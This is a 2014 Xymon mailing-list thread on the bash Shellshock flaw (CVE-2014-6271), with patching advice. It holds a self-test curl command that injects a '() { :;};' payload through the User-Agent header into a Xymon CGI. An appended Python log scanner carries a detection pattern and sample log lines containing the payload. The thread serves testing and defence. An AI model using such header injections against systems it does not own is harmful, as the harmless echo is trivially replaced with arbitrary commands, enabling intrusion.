[Xymon] FYI: CVE-2014-6271 - bash vulnerability
Troy Adams
troy at athabascau.ca
Thu Sep 25 22:09:40 CEST 2014
Oh, yes, very terrible.
And if you want to test to see that you are vulnerable through Xymon, you can try this harmless exploit:
your_workstation$ curl -k -H 'User-Agent: () { :;}; echo vulnerable>/tmp/test-xymon-shellshock' http://your_xymon_server/xymon-cgi/svcstatus.sh
<html><head><title>Invalid request</title></head>
<body>Invalid request</body></html>
...which creates a file (if you are vulnerable) in your Xymon server's '/tmp/':
your_workstation$ ssh your_xymon_server 'cat /tmp/test-xymon-shellshock'
vulnerable
your_workstation$
...so then, you can verify before and after patching.
cheers,
Troy
----- Original Message -----
From: "J.C. Cleaver" <cleaver at terabithia.org>
To: xymon at xymon.com
Sent: Wednesday, September 24, 2014 11:54:35 AM GMT -07:00 US/Canada Mountain
Subject: [Xymon] FYI: CVE-2014-6271 - bash vulnerability
This is an important one to patch your systems on, if you haven't already.
The xymon CGI interface runs via shell wrappers around the actual C cgi
code (to set the environment properly), which means this would be an
avenue for attack.
Alternatively, using /bin/dash or some other shell besides bash (often
/bin/sh on Linux distros) is another workaround. (This is the default on
the Terabithia RPMS for EL6.)
More info:
http://seclists.org/oss-sec/2014/q3/650
https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
https://access.redhat.com/articles/1200223
Regards,
-jc
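As an added example (not code from the list post, from Troy, or from the Xymon project), here is the defender's side of the exchange above: a small scanner that reads web-server access log lines and flags requests whose request line, Referer or User-Agent begins a value with the `() {` function-definition prefix, which is what the curl test sends and what reaches the shell-wrapped Xymon CGIs J.C. describes. The log lines are constructed for the example; the parser assumes the Apache/nginx "combined" log format, and the field names and function names are this example's own.

```python
import re
from typing import Dict, List, Optional

# Apache/nginx "combined" log format (assumed):
# ip - user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# CVE-2014-6271 is triggered by an environment value that starts with a
# bash function definition, "() {"; allow the whitespace variants seen in
# the wild ("() {", "(){", "() \t{").
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

# Header values a CGI server exports into the environment of the handler.
CGI_ENV_FIELDS = ("request", "referer", "agent")


def is_shellshock_payload(value: str) -> bool:
    """True if the value carries the function-definition prefix."""
    return bool(SHELLSHOCK_RE.search(value))


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one combined-format line; None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_shellshock_attempts(lines: List[str]) -> List[Dict[str, str]]:
    """Return one record per request carrying the payload in any CGI-exported field."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # unparseable line: skip rather than guess
        for field in CGI_ENV_FIELDS:
            if is_shellshock_payload(rec[field]):
                hits.append({
                    "ip": rec["ip"],
                    "time": rec["time"],
                    "field": field,           # where the payload travelled
                    "request": rec["request"],  # which CGI was targeted
                    "status": rec["status"],
                })
                break  # one record per request is enough for triage
    return hits


# Constructed sample log lines (not real traffic). The first mirrors the
# curl test from the post; the third carries the prefix in the Referer.
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Sep/2014:13:02:11 +0000] "GET /xymon-cgi/svcstatus.sh HTTP/1.1" '
    '200 71 "-" "() { :;}; echo vulnerable>/tmp/test-xymon-shellshock"',
    '198.51.100.4 - - [25/Sep/2014:13:02:15 +0000] "GET /xymon/ HTTP/1.1" '
    '200 8124 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.9 - - [25/Sep/2014:13:03:40 +0000] "GET /xymon-cgi/hostsvc.sh?HOST=web1 HTTP/1.1" '
    '200 71 "() { :; }; /bin/true" "curl/7.37.0"',
    'not a log line at all',
]

if __name__ == "__main__":
    for hit in find_shellshock_attempts(SAMPLE_LOG):
        print(f"{hit['time']} {hit['ip']} via {hit['field']}: {hit['request']} -> {hit['status']}")
```

Running it over the sample lines reports the two probing requests and their target CGI, which is what you want on the server side both to confirm that a test like Troy's actually reached the CGI and to spot anyone else trying the same thing before the patch or the /bin/sh-to-dash switch is in place. Note that a 200 (or the "Invalid request" page) says nothing about whether the command ran; only the host-side check, or a patched bash, tells you that.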
_______________________________________________
Xymon mailing list
Xymon at xymon.com
http://lists.xymon.com/mailman/listinfo/xymon